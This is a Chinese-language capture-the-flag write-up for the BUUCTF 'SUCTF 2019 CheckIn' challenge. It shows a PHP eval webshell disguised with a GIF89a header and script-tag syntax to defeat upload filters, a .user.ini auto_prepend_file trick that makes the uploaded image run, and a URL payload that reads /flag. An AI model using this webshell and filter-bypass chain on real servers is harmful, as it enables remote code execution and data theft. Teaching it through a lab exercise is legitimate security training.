BUUCTF [SUCTF 2019]CheckIn 1(user.ini文件构成的PHP后门 | 两种解法!)

白猫a٩2023-11-29 10:37

题目环境:

可以看出是文件上传类的题目

绕过后缀的文件格式有php、php3、php4、php5、phtml、pht。

构造木马文件
<?php @eval($_REQUEST['shell']); ?>

这里我把文件命名为了shell.php

上传木马文件

illegal suffix!

非法后缀
将shell.php改为shell.jpg

继续上传木马文件

<? in contents! 存在违法内容"<?"
改变思路点

将PHP一句话木马转换为JS形式

重构木马文件
<script language="php">@eval($_REQUEST['shell']);</script>

继续上传

exif_imagetype:not image!

Exif _ imagetype: 不是 image!
Exif _ imagetype无法检测GIF动态图片

GIF的ASCII值是GIF89a

木马前面加GIF89a来绕过Exif _ imagetype的检测

重构
GIF89a<script language="php">@eval($_REQUEST['shell']);</script>

上传

上传成功

使用中国蚁剑测试连接

可以连接,但是返回数据是空的

猜测后台并没有解析PHP代码

访问题目源码

提示是.user.ini配置文件
这里呢,我发现.user.ini配置文件与.htaccess配置文件比较类似

概述来说,htaccess文件是Apache服务器中的一个配置文件,它负责相关目录下的网页配置。通过htaccess文件,可以帮我们实现:网页301重定向、自定义404错误页面、改变文件扩展名、允许/阻止特定的用户或者目录的访问、禁止目录列表、配置默认文档等功能。

注意这几个字"改变文件扩展名"。

.htaccess配置文件格式

<FileMatch "1.jpg>

SetHandler application/x-httpd-php

那么我这里就觉得或者说是简单理解吧

.user.ini配置文件和.htaccess配置文件都是为了解析PHP代码
php.ini大家都熟悉,那么我们就可以把.user.ini理解为用户可自定义的php.ini配置文件
官方给的解释

两个比较有意思的东西

而这两个就是.user.ini中的两个配置项

auto_prepend_file是在文件前插入

auto_append_file是在文件最后才插入

创建.user.ini文件

GIF89a

auto_prepend_file=shell.jpg

上传.user.ini文件

访问路径文件
[http://ac513c0d-afdf-4e89-920a-93eedd63102d.node4.buuoj.cn:81/uploads/c55e0cb61f7eb238df09ae30a206e5ee/index.php](http://ac513c0d-afdf-4e89-920a-93eedd63102d.node4.buuoj.cn:81/uploads/c55e0cb61f7eb238df09ae30a206e5ee/index.php)

回显GIF89a就代表解析成功了

这里解释一下为什么index.php主文件在最后面

因为我们使用的是auto_prepend_file,在主文件之前就已经自动解析文件名了,所以index.php主文件在最后面。

第一种解法:PHP内部命令

var_dump() 函数用于输出变量的相关信息。

file_get_contents() 函数把整个文件读入一个字符串中。

构造payload
[http://19ff03ff-93cb-4b33-94ec-95a79619b92a.node4.buuoj.cn:81/uploads/c55e0cb61f7eb238df09ae30a206e5ee/index.php](http://19ff03ff-93cb-4b33-94ec-95a79619b92a.node4.buuoj.cn:81/uploads/c55e0cb61f7eb238df09ae30a206e5ee/index.php)?shell=var_dump(file_get_contents("/flag"));

上传payload

得到flag
flag{4f105e98-c110-4b71-9160-545aa8e7131e}
第二种解法:中国蚁剑
http://2d9647e6-425e-4d7f-bb6a-116f0f51bfc8.node4.buuoj.cn:81/uploads/c55e0cb61f7eb238df09ae30a206e5ee/index.php

注:中国蚁剑连接密码就是PHP一句话木马里面的参数

我这里是shell


得到flag:
flag{8f943f63-53c9-4395-9f91-d28052e52d55}

这两种方法测试完,我发现,上传木马后有时间限制,过一段时间木马就会失效,还有试过一种方法,再试另一种方法木马也会失效;只需要重新开启题目环境即可,最后,做这道题的步骤是,先上传.user.ini配置文件,再去上传PHP一句话木马文件。

相关推荐
刘若水22 分钟前
Linux: 进程信号初识
linux·运维·服务器
The Future is mine23 分钟前
Python计算经纬度两点之间距离
开发语言·python
Enti7c24 分钟前
HTML5和CSS3的一些特性
开发语言·css3
Harrison_zhu31 分钟前
Ubuntu18.04 编译 Android7.1代码报错
android
爱吃巧克力的程序媛31 分钟前
在 Qt 创建项目时,Qt Quick Application (Compat) 和 Qt Quick Application
开发语言·qt
zhu12893035561 小时前
网络安全的重要性与防护措施
网络·安全·web安全
chem41111 小时前
Conmon lisp Demo
服务器·数据库·lisp
渗透测试老鸟-九青1 小时前
面试经验分享 | 成都渗透测试工程师二面面经分享
服务器·经验分享·安全·web安全·面试·职场和发展·区块链
阳小江1 小时前
Docker知识点
运维·docker·容器
独好紫罗兰1 小时前
洛谷题单3-P5719 【深基4.例3】分类平均-python-流程图重构
开发语言·python·算法
热门推荐
01我决定放弃搞 Java 了02DeepSeek各版本说明与优缺点分析03如何在WPS和Word/Excel中直接使用DeepSeek功能04本地化部署AI知识库:基于Ollama+DeepSeek+AnythingLLM保姆级教程05苍穹外卖面试总结06从零安装 LLaMA-Factory 微调 Qwen 大模型成功及所有的坑07RAG 实践- Ollama+RagFlow 部署本地知识库08DeepSeek R1本地化部署 Ollama + Chatbox 打造最强 AI 工具09如何本地部署AI智能体平台,带你手搓一个AI Agent10Android下HWC以及drm_hwcomposer普法(上)